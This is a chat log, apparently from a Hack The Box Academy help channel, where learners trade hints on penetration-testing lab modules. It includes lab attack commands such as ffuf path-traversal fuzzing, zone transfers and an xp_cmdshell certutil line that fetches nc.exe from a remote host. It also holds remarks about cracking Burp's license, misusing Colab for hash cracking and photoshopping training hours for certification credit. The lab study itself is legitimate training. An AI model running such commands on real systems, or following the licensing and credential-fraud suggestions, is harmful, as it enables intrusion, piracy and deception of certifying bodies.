#modules
i think because the academy is paid content, only the tier 0 modules are allowed public walkthroughs
Hi, I am doing the footprinting hard lab. I figured out that the SNMP server is v3 but cannot find the community string. I used onesixtyone with the SNMP seclist but got nothing, only "linux nixhard 5.4.0_90 generic #101 ubuntu smp", and no community string. I could also interact with the IMAP and POP3 servers but am not sure what commands I should use on IMAP... or am I on the wrong track? I don't know where I can get the RSA for SSH...
yeah module writeups would be pretty antithetical to the purpose of the modules
not like challenge boxes where a writeup might teach you about a new technique or attack. The module already does that, you just have to apply it.
Is this the right place to post questions about module exercises?
I'm super stuck.
I mean looks like ya got it to me
It asks for the version for service running on 8080. Looks like Apache Tomcat/9.0.31 is running on 8080 but it says that 9.0.31, 9, 9.0, Apache Tomcat, etc are all wrong
same. that's why I'm so confused
which module/section are you on? I'll review it real quick
You're awesome. Getting Started - Service Scanning
ah gotcha, yeah the Apache Tomcat you've tried is correct. If you copy pasted, make sure you didn't accidentally include an extra space somewhere
9.0.31 gives me an error...
well thats not the one I said was correct so lol
rekt. Thanks for confirming I'm not crazy. Must just be a bug on their end.
99/100 times it's just an errant space from copy paste
it's a strict text match
Well I got the student membership sometimes I get stuck but don't have the time to try every method and option
Or I find out that I had the answer the whole time I just wasn't pasting the whole thing
Don't take me the wrong way here, but that's a very poor way to approach the material
It isn't if you study
it'll bite you in the foot come skill assessment or exam time
The whole point is to learn how to use the tool
So that I can start using it in real engagements
That's what I've been doing
not really, the CPTS is focused on TTPs
Okay then what should I do
but let's say your way is right, copy pasting things isn't really learning the tools either
If studying and applying the material in real scenarios isn't enough
Wdym copy pasting?
I'm just quoting what you've said my friend
wdym by not having the time to try every method and option then? before I criticize that specifically and you actually meant something else
No I think you understand what I mean by that
I try quite a few different methods
And then I try what the module is asking in the directions
I get stuck
And look it up
Well
I try to look up guides on how to use x tool first
Then I start looking for write ups
ah well, part of the whole CPTS and teaching TTPs is comprehensive approaches. Enumeration is key in the real world and it applies here too. You should be trying everything because in the real world your job may literally be trying everything. Red teams can be a little different, but standard pentests want a comprehensive approach. They don't want to know just the one way you got initial access, they want to know the myriad ways of getting initial access, for example.
Yeah I definitely agree with you but I usually just have so many other factors I'm dealing with
I prefer this kind of self education
But
its a demanding field
I'm also taking 16 credit hours
Along with a part time job
I just feel like I'm wasting my time when I look at
Estimated time:45 min and I've spent like
2 hours on it
It's discouraging I guess
I feel it, but it's not something you can shortcut and do well on later
don't worry about the time estimates, they're all bullshit
the 41 days or so overall estimate btw is assuming 1 day = 8 hours of active work for each day
the first dude who passed the exam already had half the modules done 'cause of the CBBH and had a full time security job and still took 49 days to complete the rest.
I've had days where I blitzed 3 modules in one day, and then 2 weeks on a module that says 2 days.
Damn okay that's a bit relieving lol
I literally do not look at the time estimates at all
Alright I appreciate the advice man I'm gonna go back to htb and try my best
good luck
I made it a lot farther on tryhackme
Only cause they have a write up for every activity
remember the golden rule: HTB easy is THM medium/hard
I think you got that backwards
this platform is just objectively more advanced in difficulty than THM
I breeze through thm
Yes, that's what I'm saying
Okay
"easy" ranked HTB content is more equivalent to medium or hard ranked THM content and it only goes up from there
and cpts is a whole mix of easy and medium modules
Sorry had to do something @thorn urchin
Do you have any suggestions advice on where to start in Red Teaming
On htb
I mean the CPTS itself is a good start. There's also the pro labs that are whole simulated networks so they're really good. Dante in particular gets heavily recommended as extracurricular exam prep after you're done with the modules.
Difficulty with red teaming specifically is that there's a slight shift of general approaches and goals compared to regular pentesting, and so a lot of educational content is ill suited for it. A lot more of like C2 domain name preps, EDR evasions, phishing, state of the art attacks like ADCS attacks.
Dante, yeah, me and a buddy were planning on doing an engagement on Dante
I'd focus more on nailing general pentesting stuff before worrying about red team content. There is no real jr red teamer that isn't already a senior pentester basically lol
Ah alright idk I've just heard a lot from friends in the field
You don't know who has the best advice on all that but I agree
no worries, mostly I'm parroting what I've heard as well
I think I should study more tools in pentesting before attacking ADs
CPTS modules have a couple excellent ones dedicated to AD anyways
the Active Directory Enumeration and Attacks module is a mammoth, expect to spend a lot of time on that one
30+ sections lol
Dumb question but what are CPTS
its the HTB certification
if you're doing modules you're typically on either the CPTS or the CBBH paths for their certs
CPTS is meant as a competitor to the OSCP
Thanks for all the advice man I didn't know that I'm definitely gonna try pursuing that as my self education goal now
I wanted to take the oscp down the road
But if I can start studying it now that'll definitely help a ton
np, typically in this channel the assumption is that you're going for one of those two
The cbbh path is bug bounty I'm guessing?
yeah, greater focus on web app pentesting stuff
Is there an equivalent of that cert?
Like the oscp
Web app pentesting sounds like a nightmare to me
I think PortSwigger has some certs that are comparable or even more in depth (they're the Burp Suite guys after all). Other than that the only ones that come to mind are pretty minor stuff
offsec do OSWE as well
but yeh PortSwigger's web security academy is amazing
and they have a cert for it now
oh yea their cert is going to be $9 on black friday so i'm definitely going to do that cert in a few months
they were doing it for free when they released it
problem is you need burp pro
so it's not really free
does burp pro still have lifetime licenses?
cause tbh if you're gonna get serious about web app stuff, it's really not a bad pickup
ah yeah oof
God mother fuckin damn
400
How much was a lifetime license when they were around lol
nope it's $449
I mean the price is still worth it if you're super serious, it's pretty clearly the most powerful web app testing tool around
has anyone done the hashcat module?
yeh if you're doing bug bounty or web app pentesting professionally you'd be silly not to get it
I know they used to be pretty chill about cracking it on the basis that if you had the skills to do so you've earned it, but I doubt they still have that unofficial policy anymore.
or maybe I'm thinking of IDA, memory could be fuzzy
How do you know if pentesting/red teaming or web app pentesting and that is for you
Everything else I've been doing in life just doesn't feel as fulfilling and feels like I'm wasting my time
Learning both IS pretty practical, but specialization helps a lot
@lament tartan can u help me with last question?
last question asks for the password i get 5 times, the problem is i got more than one five times and i've been stuck there for a week lmao
oh sorry i haven't done the module
thought you meant the hashcat section of the CPTS track
if you shot me a giftcard for the cubes i'd take a look at it and help out in a couple of days
jk dont do that
@sly reef so the skill assessment? (i finished that module btw)
after cracking the hash did you use the DPAT tool?
nope
yea... use that
@lament tartan hey, how do u transfer a directory to the attacked machine because scp is not working
oh you don't need to crack them all
the given NTDS.zip file? you can just use wget
i normally use wget or smb
oh you can get the most common password without cracking 100% of the hash i think i didn't even come close to 60%
can u tell me which one you got? Idk what i am doing wrong
i've been trying for a week now
lol
also i'm not 100% sure about this but i think they did add some uncrackable hash to make this realistic
use the DPAT tool (with your hashcat.potfile)
@lament tartan @vital adder thanks
oh rdp as well, if you can enable it then just copy and paste the dir
if you're a renegade that doesn't care about opsec, xfreerdp has the +home-drive option that will mount your home dir for easy file transfer as well.
i think it depends on whether you can crack a tool like Burp; if you can then i think you've earned it, but if you just download other people's cracks then 100% not. also i think STÖK did talk about some of the cracks (but i got brain damage from htb so not 100%)
oh nice, i think this did get covered in the file transfer module or something
oh definitely. I've looked at the jar file before out of curiosity but conveniently the license key sections don't decompile properly with the public decompiler tools, which definitely makes it non trivial too
there's binary versions as well I've not examined at all
it's one of the reasons that I know people who say reversing java is easy, you just decompile it, have never tried reversing anything other than a trivial java jar
Got it. Where can i suggest a correction for the module? #858470491676737536 ?
thanks btw
Hi there guys having some trouble on Attacking Web Applications with FFUF
Try running a VHost fuzzing scan on 'academy.htb', and see what other VHosts you get. What other VHosts did you get?
I'm using the command:
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://178.62.84.158:30146/ -H 'Host: FUZZ.academy.htb' -fs 900
It detects everything
your fail condition is probably faulty then
+1 this
see what result you get back with just the academy.htb and one with like a bogusobviouslynotreal.academy.htb and see if you can spot a difference in their response and use that
yeh filtering response size 900 there, if the response sizes vary then you can filter by response code or regex
the regex option often doesn't work for me on academy though, even when i can see the text in the response
Yea, just followed what madf0x suggested and it worked, i'm going to try the other filters Crypto, and see how it pans out
Do paid tools like Burpsuite Pro have these kind of functionalities ?
an auto calculate fail condition would be a cool feature to add to ffuf (assuming it doesn't have one already built in somewhere deep down)
yeh burp free does as well, it's just severely throttled
also gobuster, I don't remember if it auto-detects or not for vhosts though
yeh you can use --exclude-length option also with gobuster
Someone got a tip for the easy lab on password attacks? i got the ftp login and i'm now logged in as mike in ssh but i don't find anything of interest on the system
@zealous belfry use ls -la maybe u may see something interesting
already did but did not see anything there
think of the basics first. What has that user done recently ๐
ya okay got it, well i found that earlier but it didn't come to mind to just use the pw for ssh login
¯\_(ツ)_/¯
don't worry, my notes have me embarrassed on that one, that I overlooked it until linpeas pointed it out
damn
Is anyone else having trouble spawning targets?
hello, good day... has someone done the web applications module? because the answers of the mini-exercises are not clear to me, which url I have to do the tests on
gonna need to mention the specific module and section name to get help, lots of web app modules
which question you're on will be ideal as well
Hello. I am stuck with XSS Phishing... i found the payload and it works, but i don't understand how to get the username and password of the victim. Can someone please help me?
I've not done that module yet but my first guess would be to check if there's any cookies or form fields that may store that info and exfil those with your payload
Anyone else having issues with interacting with machines?
do you know where i can find walkthroughs for this module?
Usually walkthroughs are frowned upon if not banned for modules
the module IS the walkthrough, whereas the skills assessment is you applying what has been taught
might get better help after someone who's gone through that module gets online
Sent ya dm
no thanks
@thorn urchin Did the pivoting module give you any trouble? Yesterday I couldn't get meterpreter to connect at all. Today it seems like I can't even reach the vm on both pwnbox and my machine.
nope
someone else said they were having issues with machines earlier so something may be funky
I haven't had a chance today to spin up any modules to see
Weird, when it was working yesterday I couldn't get metasploit to open a socks server either
kept opening and closing
that module overall was kinda funky, but I didn't have those kinds of issues
also ngl, I cheated like half that module using more chisel n stuff than some of the more imo silly stuff.
Why
It's about the previous module we talked about
oh, should've led with that lol
Lol well the hashcat takes longer than expected
Welcome to cracking hashes
Lol
Would be super sick to get a hash cracking rig
i learned this on the tryhackme throwback lab a while back, but there is something called colabcat that's basically cracking hashes using hashcat on google colab. now i think that's against google colab TOS but the tool is still there and you can still use it
@thorn urchin Yeah it's crashing on me constantly for whatever reason
guess i'm going to take a break tonight
there ain't no rest for the wicked
Can I text anyone regarding WebAttack Skill assesment
What's also really cool are automated hash-cracking methodologies.
Makes life so much easier
A hint for the medium pw cracking lab? Logged in as ||john|| already and got the docx file open but i dont find || any databases, scripts, or ways to get root or the user dennis||
i am stuck in the section xss phishing... The exercise asks this: Try to find a working XSS payload for the Image URL form found at '/phishing' in the above server, and then use what you learned in this section to prepare a malicious URL that injects a malicious login form. Then visit '/phishing/send.php' to send the URL to the victim, and they will log into the malicious login form. If you did everything correctly, you should receive the victim's login credentials, which you can use to login to '/phishing/login.php' and obtain the flag. I found the payload but i don't understand to whom i must send the url to get their username and password
||there is a simulated user that will submit the form if you sent the correct payload||
aaaah so the payload is wrong good
Read the question more carefully :). I'm sure you can find the answer
Hi everyone! I was wondering if anyone could provide a nudge about the cleartext credentials for bob_adm in the windows privilege escalation module
get a nudge on this
What is the ObjectAceType of the first right that the forend user has over the GPO Management group?
i have run everything in powershell and bloodhound. Powershell just hangs up and I don't get anything back.
its not hanging, it just takes a REALLY long time to finish
and unfortunately I don't believe bloodhound records the answer in the format the question wants, I couldn't find a way to get what it wanted anyways
Password Attacks Module: I am stuck when I try to install CrackMapExec (I'm on Network Services). I had tried both installing it with apt install and pip / pip3 install and I have no clue what I have to do (see my screenshot)
why you trying to pip install it
use apt on kali
see if you have the libs installed apt-get install -y libssl-dev libffi-dev python-dev-is-python3 build-essential
I use Parrot Sec OS
After I run your commands and try run crackmapexec smb -h I get this Error message
i'm not sure if you can use apt on parrot then. Apt and crackmap is, as far as i know, kali only
https://wiki.porchetta.industries/getting-started/installation/installation-on-unix take a look at installing from source probably thats going to work for you
if youre using the pwnbox it should be already installed, you can also try pipx install crackmapexec
yup that's also on the page further down if you like python more
cme is written in python, you don't have a choice in the matter
just whether apt is handling the package or pip
you can also use poetry
I get same error on Pwnbox
if you are running the command as shown then that's wrong
pwnbox calls crackmapexec cme
@thorn urchin I sent you a DM if you don't mind
when I run crackmapexec smb -h I get same error on Pwnbox
bout leaving from work, be awhile before I respond
in pwnbox: sudo cme smb --help
like I said, it's preinstalled as cme
okay, I'll try it then
if that doesn't work something may have broken when you tried installing it, so reset the instance and then try cme
When I try to use sudo cme winrm on Pwnbox I get this error message
am I the only one who likes nano more than vim
I agree nano is very nice to use, but vi is more commonly installed on a server by default
You actually just solved a problem for me and you didn't mean it haha
When I try to use sudo cme winrm on Pwnbox I get this error message. Anyone have any idea or hint?
That is a warning message about blowfish being deprecated. Warnings aren't as severe as errors and we frequently ignore them.
@zealous belfry @thorn urchin I solved it! Thanks for your help
@sharp cove @languid dawn
Thanks for the heads up!
Good evening / morning
No
google is your best bet
is anyone up for a challenge?
hello, i have a windows 11 pc and 4 random persons' google profiles, all got hacked in two days
strong passwords, now i set 2FA, but i think something is on my pc
i have some cracked software
adaware free scan says all ok
but i wanna format the system disk, a clean windows install without any cracks
Hi did you have any luck with this? in the same boat....... sorted
@onyx copper we're not tech support, good luck
Can someone help on attacking common services - skill assessment easy. I found the username from SMTP and tried to brute-force it with various services, but I found nothing.
@orchid ingot anonymous login on ftp may help
new info: google spotted my pc as malware and logged out all 4 persons from the pc
on other devices the accounts work normally
i removed the adblocker from chrome extensions
Hello guys, if someone has attacked the Squashed machine in hackthebox i need help
I can't decrypt the keepass file
With an extension .kdbx
hello
Hey
hi
Any advice for getting started on CTF? Any good books? Im stuck and i dont have knowledge to find some flags.
Hack the box academy will be the best place
depends a bit on what you know but they have a great lead up for it
HTB Academy, i just rooted my first box through it
Nice job live one?
Its such an awesome feeling
nibble box
it's through the getting started module
but its a live machine too i think
Okay, so have run into a problem. I currently use/have used kali for a while and I'm getting 100% different responses with a dig command.
I've just fully updated kali, and I am still getting "communication error / timeout" when attempting to solve a problem in active subdomain enumeration.
example just for reference:
- Submit the FQDN of the nameserver for the "inlanefreight.htb" domain as the answer.
Kali: ||dig ns inlanefreight.htb @<ip>||
Response:communication error to <ip>#53: timed out
Parrot: ||dig ns inlanefreight.htb @<ip>||
Response:
```
; <<>> DiG 9.16.27-Debian <<>> ns inlanefreight.htb @10.129.42.195
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 3105
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: b2dec93a1964fb15010000006378bc6492c78e95d88c46c8 (good)
;; QUESTION SECTION:
;inlanefreight.htb. IN NS
;; ANSWER SECTION:
inlanefreight.htb. 604800 IN NS ns.inlanefreight.htb.
;; ADDITIONAL SECTION:
ns.inlanefreight.htb. 604800 IN A 127.0.0.1
;; Query time: 83 msec
;; SERVER: 10.129.42.195#53(10.129.42.195)
;; WHEN: Sat Nov 19 11:22:12 GMT 2022
;; MSG SIZE rcvd: 107
```
I have fully disconnected/reconnected my VPN when testing and I'm really unsure why in Kali I cannot get the same response or what I might have messed up. Would love some help / clarification before future problems arise regarding the same thing.
Hi, maybe a weird question, but are there pdf extracts of the text we can download to print? I am a terrible learner on screen and for example all the AD knowledge is just not getting into my mind by reading it on screen (can't doodle/note next to it, so to speak)
Hello, I have 2 questions for active directory. I try kerbrute with the jsmith.txt password list, how can i save the result easily? Why do crackmapexec and kerbrute stop enumeration when they get 1 valid user?
HI
Have you tried downloading a new vpn file? And changing the protocol to connect?
You can maybe try connecting to another region
I havent ill give that a go
Let me try
Installing a new kali box atm, i walked away for a bit so trying it now
On the Pivoting Module is anyone else unable to get a socks server running via metasploit? I've tried now on both my Kali Box & Pwnbox and I get the same thing
Shouldn't you set your SRVHOST to local?
in the module page they show 0.0.0.0
let me try that real quick
Nope, tried localhost and 127.0.0.1 as well as swapping to version 5 (and editing proxychains.conf)
BYE
I mean the ip of the machine from where you are listening
Do you mean the one facing me or the pivot target ?
Facing you
In the end the server will be listening
So the ip of that server has to be you
Is like nc -l
Similar not the same
i'm guessing using 127.0.0.0 would fail on my kali because it has to route via the tunnel
but the pwnbox does not and 127 should work, either way every tutorial I can find seems to have it pointing to 0.0.0.0
goddamn inside job is good
@pastel ginkgo shoot me a dm if you still need help with that i'll help you troubleshoot
Thanks! I got it working on Pwnbox so now im going to try on my Kali box
Hey @vital adder can I dm you real quick?
sure
I'm experiencing the same thing. I'm on the guest Parrot OS and I've double checked that the syntax is fine and that the ip is spawned
Yea i reinstalled kali
works perfectly on Parrot OS but not working at all on kali
Have fully reinstalled / updated/ moved to vmware workstation 17 as well just no go for all of it:(
Yeah I reset the workstation and refreshed the ip a few times and nothing
what is this
Active subdomain enumeration might actually be the death of me. I can't be this stupid to not understand and struggle on every question... anyways
1.Find and submit the contents of the TXT record as the answer.
so I used ||dig axfr inlanefreight.htb @<ip>|| to basically enumerate all the subdomains. From here it seems that I should be able to use something like dig txt <subdomain>.inlanefreight.htb @<ip shown from subdomain enumeration>
I can't figure out what i'm doing wrong, i've gone through every single one in this manner and am not getting a TXT response from any of these.
@low vine try on internal maybe
I guess I missed that
So its not the ip thats shown from the transfer?
Example the IP i have for HTBA is 10.129.xx.xxx
The enumeration shows ips next to the subdomains of <10.10.34.2>
@low vine no
My mental is dying in this section lol this seems so fucking easy and I'm having such a hard time lol
need to spend a bunch of time here lol
Okay other question, question before its talking about zones and identifying the number of zones we have. I basically saw that there is an "A" record and a "NS" record does that mean its only 2 zones or is my understanding wrong
Hi guys, having some trouble with Parameter Fuzzing - GET section on ATTACKING WEB APPLICATIONS WITH FFUF module.
I'm not sure if i'm doing this wrong, but i added the IP 178.62.84.158 and admin.hackthebox.htb to /etc/hosts and i'm trying to run the command
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://admin.178.62.84.158:30633/admin/admin.php?FUZZ=key -fs 341 yet it doesn't return any results
Should i add the 178.62.84.158 and academy.htb since admin is a VHOST?
Got it, needed to add the following input to /etc/hosts: SpawnMachine academy.htb admin.academy.htb
@low vine u will need to count all zones
Okay thanks for the clarification, I got it right but wasn't confident that I actually knew how to correctly do that
Hello there, i'm really stuck with a problem...
Module: PasswordAttacks -> Default Passwords
I know I have to use the Default Cred link provided, but i'm not sure how to scan using hydra.
The Port i try to Bruteforce is on localhost, so I can't attack this service using its 10.129 IP.
I tried using ssh Dynamic Port Forwarding with Proxychains, but hydra stops after 1sec because of connection error (But nmap works...)
How to brute force this localhost service ?
@rustic sage u don't need to brute force the default password
now i'm totally lost xD any hints?
Struggling hard on last question for All of the "A" records from all zones.
is there a way to recursively output everything?
or just manually go find it all
@low vine do zone transfer on inlanefreight and internal inlanefreight.htb and count all A
Yup it's what I did was more asking if there was a way to set up something to run some transfers from everything
And output it
Wasn't sure if I was just missing something
@low vine it is hard to do that since i think u can not do zone transfer on sub domains with bash scripting
Wow i'm rising to new levels of stupidity
I'm doing the command injection assessment
Busy with it all day
Trying to successfully inject whoami with different techs
But got error unable to move www-data
So i thought fuck, what am i doing wrong
Spent 2 hours
Until i realised
...
Www-data
Tunnelvision can make you blind
Yay, another module completed
Hello
Can you help me in module Active Directory
Skills Assessment 2, I'm stuck at the 4th question
hey all, new module posted today.
Hi
On the Active Directory Enumeration & Attacks module, Kerberoasting - from Linux section, what was the password to use for impacket??? Trying to use GetUserSPNs
Not the example user
Hi everyone
I don't know what you mean by this
Choose a user you have already used in the module
Hey guys evening
r u ok bro?
@raven cairn for this module it's highly recommended to keep a separate list of all credentials you've found while progressing through the sections, because they come up again a painful number of times and the module won't always remind you.
I use password spray with user list and password basic list but none results
hi all, i'm on the footprinting medium lab and a little stuck. i've tried everything (i think) so far on each port but unable to get much further, just need a bit of a prod in the right direction... i believe i need to mount? right, done that bit. lol
sure dm me.
i have a question about the module local file inclusion... in the section automated scanning they use this command:
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
this does not give the same output as explained in the module... when i go to the page there is no button to select language... but there should be one... otherwise for me it makes total sense that the curl command does not work as explained...
there should be the possibility to select the language..no?
Well try look for the parameters name
If it is not language
Try first fuzzing for a parameter bro
Reading bro
Read before ask
Hi all, Footprinting medium lab. I've done the NFS but can't open the dir i've made. permission denied. tree says [error opening dir]. what could be the reason?
you don't understand my question
uff... i am not sure if i can remember right... you logged in via rdp with the credentials? Try to login as admin via right click, might help... but it is a time since i've done this... otherwise dm me...
I havent yet found the creds...
ah...
I believe I'm meant to get them from this directory i've made, but since mounting and that I can no longer access this dir
so i cant view the information inside and unsure how to change it
||su root||
password? xD lol
remember the whole big issue with NFS is that it respects your local machine's perms
on pwnbox there's a credentials file on the desktop, or you can always sudo su
i never knew that
ill have a look now thanks
ok that worked thank you
You are saying that you cannot find a language button. That is because it is not there
They want you to find a exposed parameter
So fuzz the parameter and filter on the right filesize
I try to help
For the Proxychains module did anyone get rpivot to work? I just used sshuttle for the last question because it was... wayyyyyy easier
i appreciate it. will do it
Damn, cannot complete more than 2 sections of introduction to AD per day
A lot of text
Hello and help lol. Im stuck at "Firewall and IDS/IPS Evasion - Medium Lab"
the question goes like this
```
Questions
Answer the question(s) below to complete this Section and earn cubes!
Target: 10.129.130.173
Time Left: 46 minutes
- 1 After the configurations are transferred to the system, our client wants to know if it is possible to find out our target's DNS server version. Submit the DNS server version of the target as the answer.
```
i tried everything yet have nothing
most likely i was stuck at the easy lab too. but with some help i got it but 2nd one is deadly idk what to do tbh 2 days or so stuck here
What is the standard protocol that DNS uses?
@acoustic owl can i pick your brains with SQL database locating a user?
sure
@gaunt juniper check the DNS Proxying section in the "Firewall and IDS/IPS Evasion" topic
how? lmfao
footprinting medium lab
im right up to the last part now
and no idea how to locate the user/pass
Do you have access to the database?
@rustic sage what do you get when you do select name from sys.databases
keeps crashing too which is annoying
then you only have to query the table in the database.
||SELECT * FROM table WHERE username='HTB' ||
i did, tried everything, read the commands about 4 times
lol
@gaunt juniper I think this one I got by luck. It wasn't working and I just did a normal nmap -p- with a --min-rate 5000 and it worked. But I don't think it was supposed to work
Which protocol are you trying?
Anyone around for a question on the medium lab for the footprinting module?
I've found credentials from ||nfs port, for what should be rdp, but the xfreerdp keeps returning the following error||
Any help on connecting to rdp would be greatly appreciated
Put the password in quotes to keep bash happy and hide the screenshot with the credentials to avoid spoilers
+clipboard in the xfreerdp command is also helpful
hi
Does anyone have an idea on how to check what commands a user can run as root
I'm doing the Linux PrivEsc module
I've tried doing sudo -l and then submitting the command that says (root) NOPASSWD: /usr/bin/******* and various variations of that command like sudo (command) as the answer
Anybody got an idea of what might be the problem
||try the /usr/bin/** again and make sure you have no extra characters or anything||
thank you
yw
Hey guys, I'm learning in the HTBA, im wondering if I need to use parrot or is it ok to use Kali? Appreciate the advice, my goal is to get the pentester cert in the coming year so not sure if the OS will matter
kali is fine to use
@balmy radish Ty sir
You'll need to connect to the VPN for the non-docker exercises if you aren't using the ParrotOS pwnbox
yw
Ok sure, I think I had been planning to connect to the VPN most of the time moving forward as I feel more comfortable working in my VM instead of pwnbox.
@balmy radish Im working through the setting up module, and they have a recommended tool list file, is this just an example of what we should have or should we actually have all these tools in the file? As I see a step to update all tools in a certain file
Hopefully that makes sense haha
You can always install the tools as you need them. I mostly use the pwnbox.
Roger
Have you finished AD Skills Assessment part 2?
Okok im stuck at the 4 question but we can see together if i finish it or come in dm
hey can I reset the progress of the module? I have one that I've started long ago and want to jump with fresh state
Hey, I'm stuck on the deserialization - Skill Assessment I. I guess I'm stuck with the last exception to escape for my payload, can someone help me?
Yes if you click on a module (you've already completed), you'll see a button for Retake Module.
and if I didn't complete? I have it like halfway through
didnt see such option
I don't think there is a way unless you see that "Retake Module" button.
Hi, I have some problem with Blind Data Exfiltration from Web Attacks module
I could not get any response from the server
Thanks for the tip, giving that a go!
Cancel my message im gonna just try to re-read all my notes n stuff.
help me Find a way to start a simple HTTP server inside the PWNBOX or your local virtual machine using NPM. Send a command that launches a web server on port 8080 (use a short argument to specify the port number).
What have you tried? Have you tried the man pages? Have you tried looking up how to do so on a search engine?
I wrote teams. but alas does not miss
I recommended for them to use a search engine already.
You don't learn anything if we just give you the answer... Try doing some research and we can nudge you in the right direction if you still need help
Im gonna put my ego aside actually for this - seems people have had issues in the past
Its a badly worded question tbh
I dont think it is unreasonable to find this question confusing if you are a beginner
Can I have a hint for Privilege Escalation - Flag 2
I'll give some context, one moment
I think I was answering your question before you deleted it.
I usually really hate asking for help but
I think I really need to just kind of accept it, I don't think im the only one struggling being new to it
I don't know the specific module, but have you looked for any interesting files? Are there any SUID, GUID, capabilities? See if you're apart of any interesting groups
It's okay to struggle, just never give up
Also take a break when you get flustered : )
Im too stubborn for that aha-
I haven't been giving up- ill check for files
I think I found passwd earlier but it's just nonsense, nothing to decode
I haven't done the privilege escalation modules yet so I can't really be of much help besides telling you what to look for. I just started the CPTS path, but it'll be a while before I get there
This is "Getting Started" ^^;;;
ahh okay I went ahead and figured out the answer
What?!?!
That quick?!...damn ;-;
so there is something you're missing I'm trying to think of how I can word it where it won't give it away
I'm going to dm you in case so there is no spoiler
@rustic sage what is the problem
okieokei!
It's privilege elevation, im stuck in a loop of not being able to do anything with user2, I've found the file but keep getting asked for a password and can't find anything important, and the SSH keys are going over my head (I think)
Check your DMs @rustic sage
Hey has anyone gone through the file transfer module?
Just started … I see I need to get a bit more familiar with powershell
Guess bash too right?
Any advice?
Thx!
Linux or windows?
I already helped them, they should be good now
Okii
now I have to figure out keys 
Hello everyone, in AD skills 2 Q7. I tried this:
SQL> xp_cmdshell powershell.exe certutil.exe -urlcache -split -f http://10.129.8.49:8000/nc.exe C:\Users\Public\Downloads\nc.exe
output
But: CertUtil: -URLCache command FAILED: 0x80072ee2 (WinHttp: 12002 ERROR_WINHTTP_TIMEOUT)
How can I do it?
I supposed its a restriction error ?
Hey, I'm stuck on the deserialization - Skill Assessment II. I dont really know what i am doing wrong, someone can help me ?
Hey guys wat is nmap -D rnd:x for?
from my understanding it just creates extra
ip addresses
that send the same packet you do
to create some anon
for you
I got a gift card and redeemed it. But I can't spend it even though my account balance would cover a silver subscription. How can I spend it? xD
@bleak heart buy silver subscription
"You need to add a payment method to purchase cubes. " but I dont have paypal or a credit card and therefore can't add any other payment method than the gift card. If I click to subscribe I'm asked to enter my credit card info. Do I miss something or is it not possible to buy anything from the account balance if you dont have any payment method added?
and I can't enter the gift card code during checkout because I already redeemed it (the money is stuck in the account balance)
@bleak heart if u cannot buy silver without credit card that is hard maybe u will need to pay cubes only with that gift card
its a little more economical to get the platinum plan for like 2 months then downgrade to silver or student, get more cubes for less that way
Heyo i need some help with last flag of the deserialization attack module, if someone can help pls DM me
May I have some help with Reverse Shell & Payloads - The Live Engagement? I'm receiving an exploit failed message when attempting to run the exploit for the blog site.
Make sure to check the IP address you are using before launching the exploit.
Thank you for the feedback @unique valve. I have confirmed I am utilizing the correct ip address of the blog site. It is a "NoMethodError undefined method 'split' for nil:NilClass" message.
Also confirm that you are using the correct LHOST address. Keep in mind that in this assessment you are connecting to an additional internal network.
Once I get past Information Security Foundations, I was thinking of doing bug bounty pathway before doing CPTS. Is that a bad way to go or should I do CPTS first? I'm a student who wants to bug hunt but I also want to be a pentester someday.
I started the InfoSec fundamentals path to get prerequisites to do either
Anyone else encounter this error when trying to do the chisel section of the Pivoting module?
@rustic sage Did you figure it out?
No
Yes but I relaunched my kali and tried in the parrot and it resolved it, I don't know how
can you help me
hi, please when start the competition of Hack the Box ?
There is no LHOST option for this exploit and just an LPORT. I also changed the LPORT to a verified open port on the box but that didnโt help either.
Weird, I got it to work when I built chisel on their machine and put it on the ubuntu server and it then played nicely with both my kali machine and theirs
yes maybe a bug ?
yeah Im thinking something just wasnt playing nice with my kali box. I've noticed theres a few bugs with this module
Yeah i remember i have changed few times kali and parrot for this module and it solve big
bug
Some box work better with kali and some box with parrot 
how did you solve it?
Hey guys im trying the Passwords Attack Module from the Junior Path, and I dont understand this question.
Find the user for the WinRM service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer.
The module provides a list of both usernames and credentials as Resources, but when I try to use them, I'm unable to do a successful brute-force. Is there anything that I'm missing? Is there a way to get the user without having to brute-force both user and password?
Did you have issues with the Windows RDP tunneling? I try and load the dll and it returns an error code. || I already disabled AV ||
@pastel ginkgo are u on pivoting module
Yeah the last part before the assessment
@pastel ginkgo have u done rpivot section
@pastel ginkgo I have failed to transfer rpivot directory so i have not solved it maybe i will try to use sshuttle
@rustic sage I haven't gotten there yet. I'm stuck on the 5th question in AD assessment 1
which section of the module?
whats the section name that you are stuck on in that module?
I could likely help ive finished that module
@thorn urchin Were you ever able to do the RDP pivot of the pivot module correctly? For whatever reason traffic isn't running over Proxifier. I got the flag but that was rdp from one machine to the next not via the fancy proxy
nope I did it your way too
fwiw Ive never heard of anyone actually proxying that way IRL
rip this module is probably the buggiest one yet
half the time im not sure if im not doing right or its bugged
yeah its my second least favorite module so far, though the chisel section carries the whole thing on its back because chisel is just that good
I added notes about cross compiling and smaller bin size and that was helpful
the issue I ran into with it is if I compiled it on my linux machine it wouldn't work on the remote machine. If I compiled from pwnbox it worked
yeah that idk
downside of sshuttle is its not as flexible, whereas chisel can just be a pure socks5 proxy
Dm if you want
has anyone ever used these modules on HTB academy as CEU's when renewing Sec+
good question
I asked the same thing I need to pay for my CEs and find out
So after downloading my transcripts it does not list # of hours, so I don't think it would be accepted
its also missing date of completion
I think if you go into your dashboard and click on completed modules it does show your date of completion. Or you can "retake" the module and today will be your date of completion lol
now as far as the hours my friend, think outside the box, nothing a little adobe photoshop can't work out.
it tells you on the main page how long a module takes or "should take"
i was gonna try it out...i mean i used my college class as hours before...all i did was put the description...
Hi guys, I need help with the 'Working with rules' practice section in the hashcat module, please. I believe I'm doing what is being asked but am obviously missing something.
